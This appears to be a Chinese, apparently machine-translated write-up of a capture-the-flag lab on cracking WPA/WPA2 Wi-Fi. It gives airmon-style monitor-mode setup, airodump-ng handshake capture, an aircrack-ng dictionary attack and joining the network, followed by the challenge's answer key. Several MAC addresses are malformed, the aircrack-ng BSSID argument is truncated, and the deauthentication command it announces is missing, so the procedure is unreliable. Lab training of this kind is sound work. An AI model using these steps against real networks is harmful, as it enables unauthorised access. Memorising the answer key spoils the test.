如果您想使用 WPA,请按星号键!
在今天的挑战中,我们将学习 WPA/WPA2 破解攻击的原理!”
让我们一起来看看这个故事吧?
学习目标
- 了解什么是 Wi-Fi
- 探讨其对企业的重要性
- 了解不同的 Wi-Fi 攻击
- 了解 WPA/WPA2 破解攻击
基本术语
Now let’s get into the real deal
根据提供的详细信息,使用 ssh 登录机器
ssh glitch@10.10.239.98
运行下面的命令,查看网络上可用的任何无线设备及其配置:
iw dev
现在我们可以看到所需的基本信息,设备/接口是 wlan2,address(02:00:00:00:00:02:00)和类型(托管),我们将把类型改为监控,以实现我们的目标。
现在,我们要使用 wlan2 设备扫描附近的 Wi-Fi 网络。
sudo iw dev wlan2 scan
现在我们可以看到设备的 BSSID 是
02:00:00:00:00:00:00,SSID 是 MalwareM_AP
现在,让我们将模式设置为监控,以允许 Wi-Fi 接口监听该特定信道上的所有无线流量
sudo ip link set dev wlan2 down
sudo iw dev wlan2 set type monitor
sudo ip link set dev wlan2 up
现在,如果我们查看接口信息,就会发现它已被设置为监控:
sudo iw dev wlan2 info
现在,让我们再创建一个 SSH 会话。我们需要有两个独立的终端。
在第一个终端上,我们首先捕捉该区域的 Wi-Fi 流量,特别是 WPA 握手数据包。
我们可以使用命令 :
sudo airodump-ng wlan2
这将为我们提供已有的信息,因此我们要捕获接入点的特定网络信道和 MAC 地址(BSSID),并将信息保存到以 output-file 开头的几个文件中,这就是我们稍后要暴破的文件。
还是在第一个终端上,运行下面的命令:
sudo airodump-ng -c 6 --bssid 02:00:00:00:00:00 -w output-file wlan2
现在我们收到了客户端信息,注意 STATION 部分显示的设备 BSSID(MAC)为
02:00:00:00:00:01:00,它连接到了接入点。这就是我们要侵入的连接。
接下来,让我们对第二个终端发起去验证入侵:
现在,如果我们回过头来看第一台终端,就会发现输出右上方显示的 WPA 握手信息为 WPA handshake: 02:00:00:00:00:00:00。所有这些信息都已保存到输出文件中。
在第二终端,我们可以使用捕获的 WPA 握手尝试破解 WPA/WP2 口令。我们将执行字典攻击,以便将口令与指定字表文件中的每个条目进行匹配。
下面的命令将为我们完成这项工作:
sudo aircrack-ng -a 2 -b 02:00:00:00:00 -w /home/glitch/rockyou.txt output*cap
现在我们找到了如上图所示的密钥,有了 PSK,我们就可以加入 MalwareM_AP 接入点了。
wpa_passphrase MalwareM_AP fluffy/champ24 > config
sudo wpa_supplicant -B -c config -i wlan2
注意: the rfkill: Cannot get wiphy information error can be ignore.
现在,让我们再次检查无线接口
就这样--显示我们已加入 MalwareM_AP SSID。
现在让我们回答问题
问题 1:我们无线接口的 BSSID 是什么?
答案 02:00:00:00:02:00
问题 2: 接入点的 SSID 和 BSSID 是什么?格式: SSID、BSSID
答案:MalwareM_AP,02:00:00:00:00:00:00
问题 3: 已经连接到接入点的无线接口的 BSSID 是什么?
答案:02:00:00:00:01:00
问题 4: 执行 WPA 破解攻击后的 PSK 是什么?
答案:fluffy/champ24
如果你喜欢这个挑战,并有兴趣了解更多信息,请随时查看网络模块。
有趣吧?第 12 天见